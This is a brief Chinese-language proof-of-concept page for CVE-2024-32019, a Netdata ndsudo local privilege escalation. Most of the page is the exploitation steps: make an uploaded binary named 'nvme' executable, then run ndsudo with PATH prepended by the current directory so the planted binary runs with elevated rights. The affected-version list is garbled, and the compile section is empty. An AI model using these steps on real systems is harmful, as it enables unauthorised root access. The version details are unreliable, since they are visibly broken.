⚠️ CVE-2024-32019 - PoC
📌 受影响版本
>= v1.45.0
,= v1.44.0-60
,< v1.45.0-169
🛠️ 概念验证
CVE-2024-32019 — 通过不受信任的搜索路径实现ndsudo
本地权限提升。
🔧 编译漏洞利用程序
|
|
📤 在目标机器上部署
-
将编译后的二进制文件传输到易受攻击的机器。
-
使其可执行:
1
chmod +x nvme
-
通过
PATH
操作利用易受攻击的二进制文件(使用上传二进制文件的相同路径):1
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
🔍 参考
⚖️ 免责声明和条款
此概念验证(PoC)代码仅用于教育和授权的渗透测试目的。
- 未经许可,不得修改、重新分发或将此代码用于任何其他目的。
- 未经授权的使用或修改可能是非法和不道德的。
- 作者对任何误用或损害不承担任何责任。